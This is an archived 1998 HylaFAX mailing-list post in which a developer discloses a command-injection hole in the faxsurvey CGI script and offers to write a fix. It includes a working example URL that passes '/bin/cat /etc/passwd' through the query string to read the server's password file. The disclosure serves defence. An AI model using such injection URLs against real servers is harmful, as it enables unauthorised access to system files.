 HylaFAX The world's
most advanced open source fax server
|
[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]
Security-Hole in faxsurvey-form
- To: flexfax@sgi.com
- Subject: flexfax: Security-Hole in faxsurvey-form
- From: Carsten Hoeger <choeger@suse.de>
- Date: Wed, 29 Jul 1998 15:20:05 +0200
Hello all, JFYI: in the faxsurvey-cgi that comes with HylaFAX is a security-hole. If you try this: http://www.anyhost-with-this-cgi.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd You can e.g. read the host's passwd... If this survey is from interest, I'll make a bug-fix. -- mfG, Carsten Hoeger ------ Carsten Hoeger - S.u.S.E. GmbH - Gebhardtstr. 2 - 90762 Fuerth - Germany fax +49-911-3206727 web http://www.suse.de ------
- Prev by Date: Re: faxgetty dying (solved 2nd third)
- Next by Date: Re: HylaFAX rpm notes
- Prev by thread: Re: faxgetty dying (solved 2nd third)
- Next by thread: Re: Security-Hole in faxsurvey-form
- Index(es):
Project hosted by iFAX Solutions